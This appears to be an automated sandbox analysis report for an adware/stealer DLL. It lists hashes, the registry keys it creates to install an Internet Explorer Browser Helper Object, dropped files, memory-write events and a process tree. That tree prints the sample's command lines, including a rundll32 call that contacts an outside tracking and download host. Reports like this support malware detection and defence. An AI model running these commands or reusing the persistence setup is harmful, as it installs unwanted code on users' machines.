88e91067b5451aaf27bd0dd78b040d926179aca988dfce71fbe285a2437c294d

Analysis

max time kernel
95s
max time network
130s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
02/12/2022, 22:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

88e91067b5451aaf27bd0dd78b040d926179aca988dfce71fbe285a2437c294d.dll
Size

214KB
MD5

c967059fdbf13e60cfc336fb28d2da21
SHA1

c6cc0d9c7c5f736f4b6b30f71407e11b03289f0a
SHA256

88e91067b5451aaf27bd0dd78b040d926179aca988dfce71fbe285a2437c294d
SHA512

89bc612d41c41a13d5f164a221939f5215a50fd6a51e2097fa98df0b07e423f9f8ec70874e4898c4f4bfb76bce3d7723bb16f3eb6afad4a4dccb28fa70015135
SSDEEP

3072:/usa86jcU4eRpsEJT+XMPTjOfqBZ/CFu1Y3+dOUX73h2gDBXNSnKALxAXM40DGgS:K7cSBjOfqzK4OOdOWDdNvAiX84

Score

6^/10

adware stealer

Malware Config

Signatures

Installs/modifies Browser Helper Object 2 TTPs 1 IoCs

BHOs are DLL modules which act as plugins for Internet Explorer.

stealer adware

Modify Registry

T1112

Browser Extensions

T1176

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{63B78BC1-A711-4D46-AD2F-C581AC420D41}	regsvr32.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Common Files\WinTools\88e91067b5451aaf27bd0dd78b040d926179aca988dfce71fbe285a2437c294d.dll	regsvr32.exe
File opened for modification	C:\Program Files (x86)\Common Files\WinTools\88e91067b5451aaf27bd0dd78b040d926179aca988dfce71fbe285a2437c294d.dll	regsvr32.exe
File created	C:\Program Files (x86)\Common Files\WinTools\rezasc.wzg	regsvr32.exe

Modifies registry class 53 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{26E8361F-BCE7-4F75-A347-98C88B418328}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BTIEINScriptConfigProj.BTIEINScriptConfig\Clsid	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}\	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\TypeLib\ = "{26E8361F-BCE7-4F75-A347-98C88B418328}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{26E8361F-BCE7-4F75-A347-98C88B418328}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{26E8361F-BCE7-4F75-A347-98C88B418328}\1.0\ = "BTIEINScriptConfigProj"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{26E8361F-BCE7-4F75-A347-98C88B418328}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\88e91067b5451aaf27bd0dd78b040d926179aca988dfce71fbe285a2437c294d.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{63B78BC1-A711-4D46-AD2F-C581AC420D41}\InprocServer32\ = "C:\\PROGRA~2\\COMMON~1\\WinTools\\88E910~1.DLL"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\Implemented Categories	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{63B78BC1-A711-4D46-AD2F-C581AC420D41}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{63B78BC1-A711-4D46-AD2F-C581AC420D41}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{26E8361F-BCE7-4F75-A347-98C88B418328}\1.0	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{26E8361F-BCE7-4F75-A347-98C88B418328}\1.0\FLAGS	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{26E8361F-BCE7-4F75-A347-98C88B418328}\1.0\0	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}\ = "IBTIEINScriptConfig"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\ProgID	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}\ProxyStubClsid32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\Version	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{63B78BC1-A711-4D46-AD2F-C581AC420D41}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\88e91067b5451aaf27bd0dd78b040d926179aca988dfce71fbe285a2437c294d.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\ProgID\ = "BTIEINScriptConfigProj.BTIEINScriptConfig"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}\ = "IBTIEINScriptConfig"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BTIEINScriptConfigProj.BTIEINScriptConfig\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{26E8361F-BCE7-4F75-A347-98C88B418328}\1.0\FLAGS\ = "0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{26E8361F-BCE7-4F75-A347-98C88B418328}\1.0\HELPDIR	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\Version\ = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{26E8361F-BCE7-4F75-A347-98C88B418328}\1.0\0\win32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}\TypeLib\ = "{26E8361F-BCE7-4F75-A347-98C88B418328}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\Implemented Categories\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{63B78BC1-A711-4D46-AD2F-C581AC420D41}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{63B78BC1-A711-4D46-AD2F-C581AC420D41}\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{63B78BC1-A711-4D46-AD2F-C581AC420D41}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\88e91067b5451aaf27bd0dd78b040d926179aca988dfce71fbe285a2437c294d.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BTIEINScriptConfigProj.BTIEINScriptConfig\Clsid\ = "{26E8361F-BCE7-4F75-A347-98C88B418322}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26E8361F-BCE7-4F75-A347-98C88B418321}\TypeLib\ = "{26E8361F-BCE7-4F75-A347-98C88B418328}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26E8361F-BCE7-4F75-A347-98C88B418322}\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BTIEINScriptConfigProj.BTIEINScriptConfig	regsvr32.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1472 wrote to memory of 1116	1472	regsvr32.exe	28
PID 1472 wrote to memory of 1116	1472	regsvr32.exe	28
PID 1472 wrote to memory of 1116	1472	regsvr32.exe	28
PID 1472 wrote to memory of 1116	1472	regsvr32.exe	28
PID 1472 wrote to memory of 1116	1472	regsvr32.exe	28
PID 1472 wrote to memory of 1116	1472	regsvr32.exe	28
PID 1472 wrote to memory of 1116	1472	regsvr32.exe	28
PID 1116 wrote to memory of 1532	1116	regsvr32.exe	29
PID 1116 wrote to memory of 1532	1116	regsvr32.exe	29
PID 1116 wrote to memory of 1532	1116	regsvr32.exe	29
PID 1116 wrote to memory of 1532	1116	regsvr32.exe	29
PID 1116 wrote to memory of 1532	1116	regsvr32.exe	29
PID 1116 wrote to memory of 1532	1116	regsvr32.exe	29
PID 1116 wrote to memory of 1532	1116	regsvr32.exe	29
PID 1116 wrote to memory of 836	1116	regsvr32.exe	32
PID 1116 wrote to memory of 836	1116	regsvr32.exe	32
PID 1116 wrote to memory of 836	1116	regsvr32.exe	32
PID 1116 wrote to memory of 836	1116	regsvr32.exe	32
PID 1116 wrote to memory of 836	1116	regsvr32.exe	32
PID 1116 wrote to memory of 836	1116	regsvr32.exe	32
PID 1116 wrote to memory of 836	1116	regsvr32.exe	32
PID 1116 wrote to memory of 1864	1116	regsvr32.exe	33
PID 1116 wrote to memory of 1864	1116	regsvr32.exe	33
PID 1116 wrote to memory of 1864	1116	regsvr32.exe	33
PID 1116 wrote to memory of 1864	1116	regsvr32.exe	33
PID 1116 wrote to memory of 1864	1116	regsvr32.exe	33
PID 1116 wrote to memory of 1864	1116	regsvr32.exe	33
PID 1116 wrote to memory of 1864	1116	regsvr32.exe	33

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\88e91067b5451aaf27bd0dd78b040d926179aca988dfce71fbe285a2437c294d.dll
1⤵
- Suspicious use of WriteProcessMemory
PID:1472
- C:\Windows\SysWOW64\regsvr32.exe
  /s C:\Users\Admin\AppData\Local\Temp\88e91067b5451aaf27bd0dd78b040d926179aca988dfce71fbe285a2437c294d.dll
  2⤵
  - Installs/modifies Browser Helper Object
  - Drops file in Program Files directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1116
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\88E910~1.DLL,DownloadURL http://dst.trafficsyndicate.com/TbStatInstLog.asmx/GetXML?TbId=40&Modul=AUTOINSTALER_DLL_IN&TUID=V3511308BB1FB90D2175B52DAE2B6D265E02553740375954666B616C74705937362B2E2E2B36332D2D2B2E33312F35&Info=AutoInstallerInstall
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 "C:\Program Files (x86)\Common Files\WinTools\msiein.dll" /u /s
    3⤵
    PID:836
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\88E910~1.DLL,Download
    3⤵
    PID:1864

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Browser Extensions

T1176

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1116-56-0x0000000075F21000-0x0000000075F23000-memory.dmp

Filesize
8KB

Download
memory/1116-57-0x00000000001B0000-0x00000000001EB000-memory.dmp

Filesize
236KB

Download
memory/1472-54-0x000007FEFB8A1000-0x000007FEFB8A3000-memory.dmp

Filesize
8KB

Download
memory/1532-60-0x0000000000110000-0x000000000014B000-memory.dmp

Filesize
236KB

Download
memory/1864-65-0x0000000000170000-0x00000000001AB000-memory.dmp

Filesize
236KB

Download